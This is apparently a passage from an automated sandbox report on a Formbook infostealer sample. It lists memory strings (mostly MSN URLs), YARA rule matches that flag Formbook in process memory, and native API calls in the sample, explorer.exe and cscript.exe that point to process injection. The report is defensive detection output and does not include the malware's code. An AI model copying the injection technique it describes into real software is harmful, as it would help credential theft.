          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/shopping/the-21-best-walking-shoes-to-wear-wherever-you-go/ss-AA
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/companies/the-opaque-investment-empire-making-openai-s-sam-altman-ri
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/other/scammer-alert-if-someone-calls-you-using-any-of-these-12-phras
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/realestate/upgrading-your-home-don-t-waste-your-money-on-these-7-ren
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/topstocks/costco-makes-huge-change-shares-news-on-membership-fee-inc
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/movies/news/netflix-users-celebrate-as-2023-masterpiece-finally-debuts-onl
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/movies/news/the-best-war-movies-of-all-time-based-on-ratings-and-no-1-is-n
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/movies/news/the-summer-box-office-is-flopping-and-quiet-place-bad-boys-rid
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/movies/news/trump-judge-faces-a-serious-problem-if-court-returns-guilty-ve
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/2-handguns-35-shell-casings-recovered-in-fatal-overnight-shooti
          Source: explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/colorado-man-s-silver-chain-saves-his-life-after-bullet-becomes
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/what-is-donald-trump-s-net-worth/ar-BB1hFO7Z
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/israel-gaza-updates-blinken-tells-israel-onus-is-on-hamas-to-ac
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/north-korea-says-it-will-stop-sending-trash-balloons-as-south-k
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/nba/the-mavs-passed-on-isiah-thomas-in-the-1981-draft-because-of-hi
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/video/peopleandplaces/top-10-catchiest-songs-of-the-2010s/vi-BB1j6YDZ
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Atlanta%2CGeorgia?loc=eyJsIjoiQXRsYW50YSIsInIiOiJHZW9y
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Atlanta%2CGeorgia?loc=eyJsIjoiQXRsYW50YSIsInIiOi
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.newyorker.com/culture/richard-brody/the-worst-thing-about-birth-of-a-nation-is-how-good-
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.patreon.com/scishow
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.techspot.com/review/2821-amd-ryzen-7800x3d-7900x3d-7950x3d/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.tiktok.com/
          Source: explorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/watch?v=cbN37yRV-ZY

          E-Banking Fraud

          Source: Yara match | File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yPURXYpFVuXra2o.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.35220353111.0000000004FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.35220436271.0000000005020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.35219560547.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000006.00000002.35236192272.0000000013989000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d | Author: unknown
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.32567719158.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 2392, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: yPURXYpFVuXra2o.exe PID: 7124, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: cscript.exe PID: 4960, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 3.2.yPURXYpFVuXra2o.exe.2febbdc.6.raw.unpack, .cs | Large array initialization: array initializer size 28702
          Source: 3.2.yPURXYpFVuXra2o.exe.74f0000.13.raw.unpack, .cs | Large array initialization: array initializer size 28702
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041A360 NtCreateFile, | 5_2_0041A360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041A410 NtReadFile, | 5_2_0041A410
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041A490 NtClose, | 5_2_0041A490
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041A540 NtAllocateVirtualMemory, | 5_2_0041A540
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041A48A NtClose, | 5_2_0041A48A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_0041A53A NtAllocateVirtualMemory, | 5_2_0041A53A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018429F0 NtReadFile,LdrInitializeThunk, | 5_2_018429F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842B90 NtFreeVirtualMemory,LdrInitializeThunk, | 5_2_01842B90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842BC0 NtQueryInformationToken,LdrInitializeThunk, | 5_2_01842BC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842B10 NtAllocateVirtualMemory,LdrInitializeThunk, | 5_2_01842B10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842A80 NtClose,LdrInitializeThunk, | 5_2_01842A80
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842DA0 NtReadVirtualMemory,LdrInitializeThunk, | 5_2_01842DA0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 5_2_01842DC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842D10 NtQuerySystemInformation,LdrInitializeThunk, | 5_2_01842D10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842CF0 NtDelayExecution,LdrInitializeThunk, | 5_2_01842CF0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842C30 NtMapViewOfSection,LdrInitializeThunk, | 5_2_01842C30
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842C50 NtUnmapViewOfSection,LdrInitializeThunk, | 5_2_01842C50
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842F00 NtCreateFile,LdrInitializeThunk, | 5_2_01842F00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842EB0 NtProtectVirtualMemory,LdrInitializeThunk, | 5_2_01842EB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842ED0 NtResumeThread,LdrInitializeThunk, | 5_2_01842ED0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842E50 NtCreateSection,LdrInitializeThunk, | 5_2_01842E50
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01844260 NtSetContextThread, | 5_2_01844260
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01844570 NtSuspendThread, | 5_2_01844570
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018434E0 NtCreateMutant, | 5_2_018434E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018429D0 NtWaitForSingleObject, | 5_2_018429D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_018438D0 NtGetContextThread, | 5_2_018438D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842B80 NtCreateKey, | 5_2_01842B80
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842BE0 NtQueryVirtualMemory, | 5_2_01842BE0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842B00 NtQueryValueKey, | 5_2_01842B00
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842B20 NtQueryInformationProcess, | 5_2_01842B20
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842AA0 NtQueryInformationFile, | 5_2_01842AA0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842AC0 NtEnumerateValueKey, | 5_2_01842AC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842A10 NtWriteFile, | 5_2_01842A10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842D50 NtWriteVirtualMemory, | 5_2_01842D50
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01843C90 NtOpenThread, | 5_2_01843C90
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842CD0 NtEnumerateKey, | 5_2_01842CD0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842C10 NtOpenProcess, | 5_2_01842C10
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842C20 NtSetInformationFile, | 5_2_01842C20
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01843C30 NtOpenProcessToken, | 5_2_01843C30
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842FB0 NtSetValueKey, | 5_2_01842FB0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842F30 NtOpenDirectoryObject, | 5_2_01842F30
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842E80 NtCreateProcessEx, | 5_2_01842E80
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842EC0 NtQuerySection, | 5_2_01842EC0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe | Code function: 5_2_01842E00 NtQueueApcThread, | 5_2_01842E00
          Source: C:\Windows\explorer.exe | Code function: 6_2_13972E12 NtProtectVirtualMemory, | 6_2_13972E12
          Source: C:\Windows\explorer.exe | Code function: 6_2_13971232 NtCreateFile, | 6_2_13971232
          Source: C:\Windows\explorer.exe | Code function: 6_2_13972E0A NtProtectVirtualMemory, | 6_2_13972E0A
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F34E0 NtCreateMutant,LdrInitializeThunk, | 7_2_051F34E0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2D10 NtQuerySystemInformation,LdrInitializeThunk, | 7_2_051F2D10
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 7_2_051F2DC0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2C30 NtMapViewOfSection,LdrInitializeThunk, | 7_2_051F2C30
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2CF0 NtDelayExecution,LdrInitializeThunk, | 7_2_051F2CF0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2F00 NtCreateFile,LdrInitializeThunk, | 7_2_051F2F00
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2E50 NtCreateSection,LdrInitializeThunk, | 7_2_051F2E50
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F29F0 NtReadFile,LdrInitializeThunk, | 7_2_051F29F0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2B10 NtAllocateVirtualMemory,LdrInitializeThunk, | 7_2_051F2B10
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2B00 NtQueryValueKey,LdrInitializeThunk, | 7_2_051F2B00
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2B90 NtFreeVirtualMemory,LdrInitializeThunk, | 7_2_051F2B90
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2B80 NtCreateKey,LdrInitializeThunk, | 7_2_051F2B80
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2BC0 NtQueryInformationToken,LdrInitializeThunk, | 7_2_051F2BC0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2A80 NtClose,LdrInitializeThunk, | 7_2_051F2A80
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F4570 NtSuspendThread, | 7_2_051F4570
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F4260 NtSetContextThread, | 7_2_051F4260
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2D50 NtWriteVirtualMemory, | 7_2_051F2D50
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2DA0 NtReadVirtualMemory, | 7_2_051F2DA0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2C10 NtOpenProcess, | 7_2_051F2C10
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F3C30 NtOpenProcessToken, | 7_2_051F3C30
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2C20 NtSetInformationFile, | 7_2_051F2C20
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2C50 NtUnmapViewOfSection, | 7_2_051F2C50
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F3C90 NtOpenThread, | 7_2_051F3C90
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2CD0 NtEnumerateKey, | 7_2_051F2CD0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2F30 NtOpenDirectoryObject, | 7_2_051F2F30
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2FB0 NtSetValueKey, | 7_2_051F2FB0
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2E00 NtQueueApcThread, | 7_2_051F2E00
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2E80 NtCreateProcessEx, | 7_2_051F2E80
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 7_2_051F2EB0 NtProtectVirtualMemory, | 7_2_051F2EB0
